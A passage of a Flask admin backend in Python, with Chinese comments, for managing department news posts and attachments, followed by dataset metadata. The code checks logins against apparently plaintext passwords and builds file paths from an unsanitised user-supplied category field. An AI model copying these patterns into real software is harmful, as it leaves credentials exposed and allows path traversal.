list()\n\n for read_item in select_NewsFile_result:\n\n dict_newsfile = dict()\n\n # 檢查檔案是否存在實體目錄\n if os.path.exists(os.path.join(currentPath,app.config['DOWNLOAD_FILEFOLDER'], read_item.get_FilePosition())):\n \n # print(\"[admin_newsfilelist]: {} is exists.\".format(os.path.join(currentPath,app.config['DOWNLOAD_FILEFOLDER'], read_item.get_FilePosition())))\n # print(\"[admin_newsfilelist]: read_item.get_NFID(): {}\".format(read_item.get_NFID()))\n # print(\"[admin_newsfilelist]: read_item.get_File(): {}\".format(read_item.get_File()))\n\n dict_newsfile['NFID'] = read_item.get_NFID() # 消息附件編號(NFID)\n dict_newsfile['File'] = read_item.get_File() # 附件(File)\n dict_newsfile['downloadURL'] = url_for('download_files',filename = read_item.get_FilePosition()) # 附件位置(FilePosition)\n list_NewsFile_all.append(dict_newsfile)\n\n else:\n\n print(\"[admin_newsfilelist]: {} is not exists.\".format(os.path.join(currentPath,app.config['DOWNLOAD_FILEFOLDER'], read_item.get_FilePosition())))\n\n return render_template('newsfilelist.html', Http_Title=Http_Title, UID=session['UID'], UserName=session['UserName'],RoleRank=session['RoleRank'],\n is_Unable=is_Unable,\n news_title = get_web_arg_news_Title,\n news_NID=get_web_arg_news_NID,\n news_Class = get_web_arg_news_Class,\n list_NewsFile_all=list_NewsFile_all,\n dplistClass= request.args.get('dplistClass'),\n URL_admin_news= url_for('news',UID=session['UID'],DPID=session['DPID'], UserName=session['UserName'],dplistClass=get_web_arg_dplistClass),\n list_URL=list_URL)\n\n\n\n@app.route(\"/editnews\", methods=['GET', 'POST'])\n@login_required\ndef editnews(): # 修改公告頁面\n \n # 驗證登入狀態是否異常\n verify_login_status()\n\n # 驗證網站目前是否有開放\n is_Unable = check_unable_page(\"editnews\")\n\n # ------------------------------------- 網頁初始化參數 ----------------------------------------------------\n # 初始化URL List\n list_URL = initialize_URL()\n\n Http_Title = \"後台修改公告\"\n\n '''查詢部門資料表實體'''\n select_DP = DP.query.filter_by(DPID = session['DPID']).first()\n\n # 取得網頁URL位址參數\n get_web_arg_edit_NID = request.args.get('NID')\n get_web_arg_dplistClass = request.args.get('dplistClass') \n\n select_News_result = News.query.filter_by(NID=get_web_arg_edit_NID).first()\n # print(str(select_News_result.get_NID()))\n # ------------------------------------- ajax傳遞參數處理 ---------------------------------------------------\n if request.method == 'POST':\n\n # 獲取json數據\n data = request.get_json(force=True)\n\n # get_js_NID = request.values.get('NID') # 公告編號(在Form 裡面Label需要用request.values.get())\n get_js_NID = data['NID'] # 公告編號\n get_js_Class = data['Class'] # 公告分類\n get_js_Title = data['Title'] # 公告主題\n get_js_ckeditor_content = data['ckeditor_content'] # 公告內容 \n\n print(\"get_js_NID: {}\".format(get_js_NID))\n print(\"get_js_Class: {}\".format(get_js_Class))\n print(\"get_js_Title: {}\".format(get_js_Title))\n print(\"get_js_ckeditor_content: {}\".format(get_js_ckeditor_content))\n\n editnews_staus = False\n log = \"\"\n\n # print(\"[admin_editnews]: 修改公告內容: NID {} , Class: {} , Title: {} , Content: {} {}\".format(\n # get_js_NID,get_js_Class,get_js_Title,get_js_ckeditor_content,get_current_datetime()\n # ))\n\n # 判斷是否前端送過來的json data是否為沒有值\n if (get_js_Class != None and get_js_Title != None) and (get_js_NID != None and get_js_ckeditor_content != None):\n \n update_News = News.query.filter_by(NID=get_js_NID).first()\n\n # 改變公告主題\n if update_News.get_title() != get_js_Title:\n\n update_News.title = get_js_Title\n\n\n # 改變公告類別\n if update_News.get_Class() != get_js_Class:\n\n update_News.Class = get_js_Class\n \n # 取得公告附件檔案資訊\n update_newsfile = NewsFile.query.filter_by(NID=get_js_NID)\n\n # 上傳檔案的根目錄位置\n img_save_dir = os.path.join(app.config['UPLOAD_FILEFOLDER'], get_js_Class)\n\n # 檢查目錄是否存在 \n if not os.path.isdir(img_save_dir):\n\n try:\n \n os.makedirs(img_save_dir)\n\n except FileExistsError: # 檔案已存在的例外處理\n\n print(\"[admin_newsfilelist]: [ {} ]目錄已存在。\".format(img_save_dir))\n\n\n # 檢查目錄內是否有對應的部門簡稱目錄\n if not os.path.isdir(os.path.join(img_save_dir, select_DP.get_DP())):\n\n try:\n \n os.makedirs(os.path.join(img_save_dir, select_DP.get_DP()))\n\n except FileExistsError: # 檔案已存在的例外處理\n\n print(\"[admin_newsfilelist]: [ {} ]目錄已存在。\".format(os.path.join(img_save_dir, select_DP.get_DP())))\n\n \n # 讀取公告附件檔案資訊清單\n for read_item in update_newsfile:\n\n # 取得公告附件檔案原始位置\n old_FilePosition = read_item.FilePosition\n\n # 切割原始位置路徑\n split_path = str(old_FilePosition).split('/')\n\n # 新公告附件檔案位置\n new_FilePosition = os.path.join(get_js_Class, select_DP.get_DP() , split_path[2])\n\n # 更新公告附件檔案位置\n read_item.FilePosition = new_FilePosition \n \n # 搬移公告附件檔案實體至新的位置\n shutil.move(os.path.join(currentPath,app.config['UPLOAD_FILEFOLDER'],old_FilePosition),os.path.join(currentPath,app.config['UPLOAD_FILEFOLDER'],new_FilePosition))\n \n # 改變公告內容\n if update_News.get_Content() != get_js_ckeditor_content:\n update_News.Content = get_js_ckeditor_content\n\n db.session.commit()\n\n # 查詢是否有修改成功\n select_News_editresult = News.query.filter_by(NID=get_js_NID,Class=get_js_Class,title=get_js_Title,Content=get_js_ckeditor_content).count()\n\n # print(\"[admin_editnews]: select_News_editresult: {}\".format(select_News_editresult))\n\n # 如果有查到修改後紀錄存在,代表有修改進去,資料筆數為大於0\n if select_News_editresult != 0:\n \n editnews_staus = True\n log = \"公告修改完成.\"\n\n else:\n\n log = \"公告修改失敗.\"\n editnews_staus = False\n\n else: \n\n log = \"公告修改失敗.\"\n editnews_staus = False\n\n\n return jsonify(dict(redirect = url_for('news',UID=session['UID'],DPID=session['DPID'], UserName=session['UserName'],dplistClass=get_web_arg_dplistClass), editnews_staus = editnews_staus,log=log))\n\n\n return render_template('editnews.html', Http_Title=Http_Title, UID=session['UID'], UserName=session['UserName'],RoleRank=session['RoleRank'],\n is_Unable=is_Unable,\n edit_NID = select_News_result.get_NID(),edit_class=select_News_result.get_Class(), edit_title=select_News_result.get_title(), edit_Content=select_News_result.get_Content(),\n list_editnews_class=list_editnews_class,\n URL_admin_news= url_for('news',UID=session['UID'],DPID=session['DPID'], UserName=session['UserName'],dplistClass=get_web_arg_dplistClass),\n list_URL=list_URL,\n dplistClass = get_web_arg_dplistClass\n )\n\n\n@app.route(\"/addnews\", methods=['GET', 'POST'])\n@login_required\ndef addnews(): # 新增公告頁面\n\n # 驗證登入狀態是否異常\n verify_login_status()\n\n # 驗證網站目前是否有開放\n is_Unable = check_unable_page(\"addnews\")\n\n # ------------------------------------- 網頁初始化參數 ----------------------------------------------------\n # 初始化URL List\n list_URL = initialize_URL()\n\n Http_Title = \"後台新增公告\"\n\n '''查詢部門資料表實體'''\n select_DP = DP.query.filter_by(DPID = session['DPID']).first()\n\n\n # ------------------------------------- ajax傳遞參數處理 ---------------------------------------------------\n if request.method == 'POST':\n\n err_log = \"\" \n\n form_Class = request.form.get('dropdownlist_Class') # 公告類型 \n form_Title = request.form.get('Title') # 公告主題 \n\n # https://stackoverflow.com/questions/7906085/getting-the-textarea-value-of-a-ckeditor-textarea-with-javascript\n form_ckeditor_content = request.form.get('ckeditor') # 公告內容\n form_is_Top = request.form.get('is_Top') # 是否置頂\n \n # print(\"form_Class: {}\".format(form_Class))\n # print(\"form_Title: {}\".format(form_Title))\n # print(\"form_ckeditor_content: {}\".format(form_ckeditor_content))\n # print(\"form_is_Top: {}\".format(form_is_Top))\n\n # 取得前端form input file list\n form_files = request.files.getlist(\"files[]\") # 新增附件\n\n # print(\"form_files: {}\".format(form_files))\n # print(\"form_files length: {}\".format(len(form_files)))\n \n # 判斷是否要置頂\n if form_is_Top == \"true\":\n form_is_Top = True\n else:\n form_is_Top = False\n \n # print(\"[admin_addnews]:class: {} , title: {} , ckeditor_content: {} , is_top: {} {}\".format(\n # form_Class,form_Title,form_ckeditor_content,form_is_Top,get_current_datetime()))\n\n addnews_staus = False \n\n # 查詢新增的公告是否存在\n select_new_exists = News.query.filter_by(\n DPID=session['DPID'], creater=session['UserName'], Class=form_Class, title=form_Title,).count()\n\n # 判斷新增的公告是否有存在\n if select_new_exists == 0:\n\n # print(\"[admin_addnews]select_new_exists : {}\".format(select_new_exists))\n\n db.session.add(News(DPID=session['DPID'], creater=session['UserName'],\n title=form_Title,\n Class=form_Class,\n Content=form_ckeditor_content,\n Top=form_is_Top,\n Createdate=get_current_datetime()))\n\n db.session.commit()\n\n # 取得新增的公告\n select_new_result = News.query.filter_by(DPID=session['DPID'],creater=session['UserName'], Class=form_Class,title=form_Title,).first()\n\n # 判斷是否有附加檔案\n if len(form_files) != 0:\n \n # print(\"[admin_addnews]: form_files length: {}\".format(len(form_files)))\n\n # 上傳檔案的跟目錄位置\n img_save_dir = os.path.join(app.config['UPLOAD_FILEFOLDER'], form_Class)\n \n # 檢查目錄是否存在 \n if not os.path.isdir(img_save_dir):\n\n try:\n \n os.makedirs(img_save_dir)\n\n except FileExistsError: # 檔案已存在的例外處理\n\n print(\"[admin_addnews]: [ {} ]目錄已存在。\".format(img_save_dir))\n\n \n # 檢查目錄內是否有對應的部門簡稱目錄\n if not os.path.isdir(os.path.join(img_save_dir, select_DP.get_DP())):\n\n try:\n \n os.makedirs(os.path.join(img_save_dir, select_DP.get_DP()))\n\n except FileExistsError: # 檔案已存在的例外處理\n\n print(\"[admin_newsfilelist]: [ {} ]目錄已存在。\".format(os.path.join(img_save_dir, select_DP.get_DP())))\n\n \n # 讀取檔案清單\n for read_file in form_files: \n\n filename = secure_filename(read_file.filename.encode('utf-8').decode('utf-8')) # 檢查檔案名稱\n\n file_path = os.path.join(img_save_dir, select_DP.get_DP() ,filename) # 配置檔案詳細路徑\n \n # print(\"[admin_addnews]: [ {} ]檔案存放路徑: {}\".format(filename,file_path))\n \n read_file.save(file_path) # 存檔上傳\n\n\n db.session.add(NewsFile(NID = select_new_result.get_NID(),File= filename,FilePosition=os.path.join(form_Class,select_DP.get_DP(),filename)))\n\n db.session.commit()\n\n addnews_staus = True\n \n else:\n\n addnews_staus = False\n\n return redirect(list_URL['news'])\n\n return render_template('addnews.html', Http_Title=Http_Title, UID=session['UID'], UserName=session['UserName'],\n is_Unable=is_Unable,\n list_addnews_class=list_addnews_class,\n list_URL=list_URL)\n\n\n# ------------------------------------------- 後台登入管理 -------------------------------------------\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login(): # 使用者登入頁面\n\n Http_Title = \"後台管理系統登入\"\n status = None\n\n if request.method == 'POST':\n\n # 獲取json數據\n data = request.get_json(force=True)\n status = data['status'] # status\n\n if status == 'login':\n\n # 查詢 使用者帳戶(User) 資料庫,帳號與密碼是否有存在\n check_result = User_Admin.query.filter_by(Account=data['account'], Password=data['psw']).count()\n \n # 判斷當前登入的帳號密碼是否有存在\n if check_result != 0: # 如果有存在筆數不為0\n \n ''' select_User_info()\n Return list_result Index details\n 權限編號(RID) list_result[0]\n 使用者姓名(UserName) list_result[1]\n 部門編號(DPID) list_result[2]\n 帳號(Account) list_result[3]\n 啟用狀態(ActivationStatus) list_result[4]\n 建立時間(Createdate) list_result[5]\n 密碼(Password) list_result[6]\n '''\n result = User_Admin.query.filter_by(Account=data['account'], Password=data['psw']).first() \n\n # TypeError: Unicode-objects must be encoded before hashing --> 編碼格式問題,解決方法為str().encode('utf-8')\n # print(\"[login]Password MD5 Hash: {}\".format(hashlib.md5(str(result.get_Password).encode('utf-8')).hexdigest()))\n\n # 判斷當前登入的帳號啟用狀態是否為啟用中(True)\n if result.ActivationStatus: \n\n login_user(result) # 會自動註冊新的session['user_id],內容為id\n\n # 查詢 科系部門(Department)資料庫,目前登入的使用者部門資訊\n select_DP = DP.query.filter_by(DPID=result.get_DPID()).first()\n\n session['UID'] = result.get_id() # 使用者編號(UID)\n session['DPID'] = result.get_DPID()\n session['DP'] = select_DP.get_DP()\n session['UserName'] = result.get_UserName() # 使用者姓名(UserName)\n logindate = get_current_datetime()\n\n print(\"[login]: UID: {} , User: {} . 登入成功. {}\".format(session['UID'], session['UserName'], logindate))\n # print(session['user_id'])\n\n # 回傳轉址URL與驗證狀態,以JSON格式\n return jsonify(dict(redirect=url_for('admin', UID=session['UID'], UserName=session['UserName']), allow_redirect=True))\n \n else:\n\n # session['UserName'] = None\n err_log = \"該使用者[ UID: {} , {} ]帳號目前停止啟用中,請聯絡網站系統管理員處理!!\".format(result.get_id(),result.get_UserName())\n\n print(\"[login]: UID: {} , {} 登入失敗,帳號未啟用. {}\".format(result.get_id(),result.get_UserName(),get_current_datetime()))\n\n return jsonify(dict(allow_redirects=False,err_log=err_log))\n\n else: \n\n err_log = \"帳號或密碼輸入錯誤!\"\n\n print(\"[login]: 登入失敗. {}\".format(get_current_datetime()))\n\n return jsonify(dict(allow_redirects=False,err_log=err_log))\n\n else:\n\n return render_template('login.html', Http_Title=Http_Title)\n\n\n\n@app.route('/logout', methods=['GET'])\n@login_required\ndef logout(): # 登出頁面\n\n print(\"[logout]: UID: {} , 部門: {} , 使用者: {} 登出系統. {}\".format(session['UID'],session['DP'],session['UserName'],get_current_datetime()))\n\n logout_user() # 登出\n\n initialize_session() # 初始化Session\n\n return redirect(url_for('login'))\n\n\n@app.before_request\ndef before_request():\n g.user = current_user\n\n# https://stackoverflow.com/questions/34795798/flask-sqlalchemy-user-query-basequery-object-has-no-attribute-password\n@login_manager.user_loader\ndef load_user(id): # 取得當前登入者的使用者編號(UID)\n return User_Admin.query.filter_by(UID=id).first()\n\n# 碰到使用者未登入情況處理,會自動轉載到請求登入頁面\n@login_manager.unauthorized_handler\ndef unauthorized():\n return \"請重新進行登入.

點我返回登入頁面

\"\n\n\n\n", "sub_path": "Server.py", "file_name": "Server.py", "file_ext": "py", "file_size_in_byte": 68584, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 32, "usage_type": "call"}, {"api_name": "Config.config", "line_number": 38, "usage_type": "name"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 40, "usage_type": "call"}, {"api_name": "Config.time_format_config", "line_number": 43, "usage_type": "name"}, {"api_name": "Config.time_format_config", "line_number": 44, "usage_type": "name"}, {"api_name": "Config.time_format_config", "line_number": 45, "usage_type": "name"}, {"api_name": "flask_ckeditor.CKEditor", "line_number": 51, "usage_type": "call"}, {"api_name": "Config.allow_file_config", "line_number": 57, "usage_type": "name"}, {"api_name": "Config.allow_file_config", "line_number": 58, "usage_type": "name"}, {"api_name": "codecs.register", "line_number": 69, "usage_type": "call"}, {"api_name": "codecs.lookup", "line_number": 69, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 73, "usage_type": "call"}, {"api_name": "flask_login.LoginManager", "line_number": 78, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 85, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 85, "usage_type": "attribute"}, {"api_name": "Config.list_unable_page", "line_number": 131, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 150, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 151, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 153, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 154, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 156, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 157, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 159, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 160, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 162, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 163, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 165, "usage_type": "call"}, {"api_name": "flask.session.clear", "line_number": 172, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 172, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 178, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 179, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 179, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 179, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 181, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 182, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 182, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 182, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 186, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 186, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 186, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 186, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 193, "usage_type": "name"}, {"api_name": "flask_login.logout_user", "line_number": 194, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 196, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 196, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 201, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 213, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 213, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 213, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 214, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 214, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 214, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 222, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 222, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 222, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 224, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 224, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 224, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 227, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 227, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 227, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 233, "usage_type": "call"}, {"api_name": "Model.News.query.filter_by", "line_number": 242, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 242, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 242, "usage_type": "name"}, {"api_name": "Model.News.Createdate.desc", "line_number": 242, "usage_type": "call"}, {"api_name": "Model.News.Createdate", "line_number": 242, "usage_type": "attribute"}, {"api_name": "Model.News.query.filter_by", "line_number": 245, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 245, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 245, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 253, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 253, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 253, "usage_type": "name"}, {"api_name": "Model.News.Createdate.desc", "line_number": 253, "usage_type": "call"}, {"api_name": "Model.News.Createdate", "line_number": 253, "usage_type": "attribute"}, {"api_name": "Model.News.query.filter_by", "line_number": 256, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 256, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 256, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 302, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 302, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 305, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 305, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 333, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 205, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 358, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 358, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 358, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 359, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 359, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 359, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 367, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 367, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 367, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 369, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 369, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 369, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 372, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 372, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 372, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 378, "usage_type": "call"}, {"api_name": "Model.News.query.filter_by", "line_number": 387, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 387, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 387, "usage_type": "name"}, {"api_name": "Model.News.Createdate.desc", "line_number": 387, "usage_type": "call"}, {"api_name": "Model.News.Createdate", "line_number": 387, "usage_type": "attribute"}, {"api_name": "Model.News.query.filter_by", "line_number": 390, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 390, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 390, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 398, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 398, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 398, "usage_type": "name"}, {"api_name": "Model.News.Createdate.desc", "line_number": 398, "usage_type": "call"}, {"api_name": "Model.News.Createdate", "line_number": 398, "usage_type": "attribute"}, {"api_name": "Model.News.query.filter_by", "line_number": 401, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 401, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 401, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 432, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 350, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 455, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 455, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 455, "usage_type": "name"}, {"api_name": "Model.Department.query.filter_by", "line_number": 457, "usage_type": "call"}, {"api_name": "Model.Department.query", "line_number": 457, "usage_type": "attribute"}, {"api_name": "Model.Department", "line_number": 457, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 464, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 464, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 464, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 466, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 466, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 466, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 469, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 469, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 469, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 475, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 498, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 498, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 503, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 503, "usage_type": "call"}, {"api_name": "os.path", "line_number": 503, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 514, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 447, "usage_type": "name"}, {"api_name": "flask.send_from_directory", "line_number": 536, "usage_type": "call"}, {"api_name": "flask.send_from_directory", "line_number": 539, "usage_type": "call"}, {"api_name": "flask.send_from_directory", "line_number": 546, "usage_type": "call"}, {"api_name": "flask.request.files", "line_number": 556, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 556, "usage_type": "name"}, {"api_name": "flask_ckeditor.upload_fail", "line_number": 568, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 571, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 571, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 576, "usage_type": "call"}, {"api_name": "os.path", "line_number": 576, "usage_type": "attribute"}, {"api_name": "flask.url_for", "line_number": 579, "usage_type": "call"}, {"api_name": "flask_ckeditor.upload_success", "line_number": 583, "usage_type": "call"}, {"api_name": "Model.User.query.filter_by", "line_number": 606, "usage_type": "call"}, {"api_name": "Model.User.query", "line_number": 606, "usage_type": "attribute"}, {"api_name": "Model.User", "line_number": 606, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 607, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 610, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 611, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 612, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 593, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 635, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 635, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 635, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 640, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 640, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 643, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 643, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 662, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 662, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 662, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 670, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 670, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 670, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 671, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 671, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 671, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 683, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 683, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 683, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 694, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 694, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 694, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 700, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 700, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 700, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 709, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 709, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 709, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 722, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 722, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 722, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 741, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 741, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 751, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 751, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 751, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 753, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 753, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 753, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 766, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 766, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 766, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 787, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 787, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 798, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 798, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 798, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 801, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 801, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 801, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 804, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 804, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 805, "usage_type": "name"}, {"api_name": "Config.list_news_class", "line_number": 807, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 619, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 829, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 829, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 829, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 833, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 833, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 836, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 836, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 850, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 850, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 850, "usage_type": "name"}, {"api_name": "Model.NewsFile.query.filter_by", "line_number": 858, "usage_type": "call"}, {"api_name": "Model.NewsFile.query", "line_number": 858, "usage_type": "attribute"}, {"api_name": "Model.NewsFile", "line_number": 858, "usage_type": "name"}, {"api_name": "Model.NewsFile.query.filter_by", "line_number": 868, "usage_type": "call"}, {"api_name": "Model.NewsFile.query", "line_number": 868, "usage_type": "attribute"}, {"api_name": "Model.NewsFile", "line_number": 868, "usage_type": 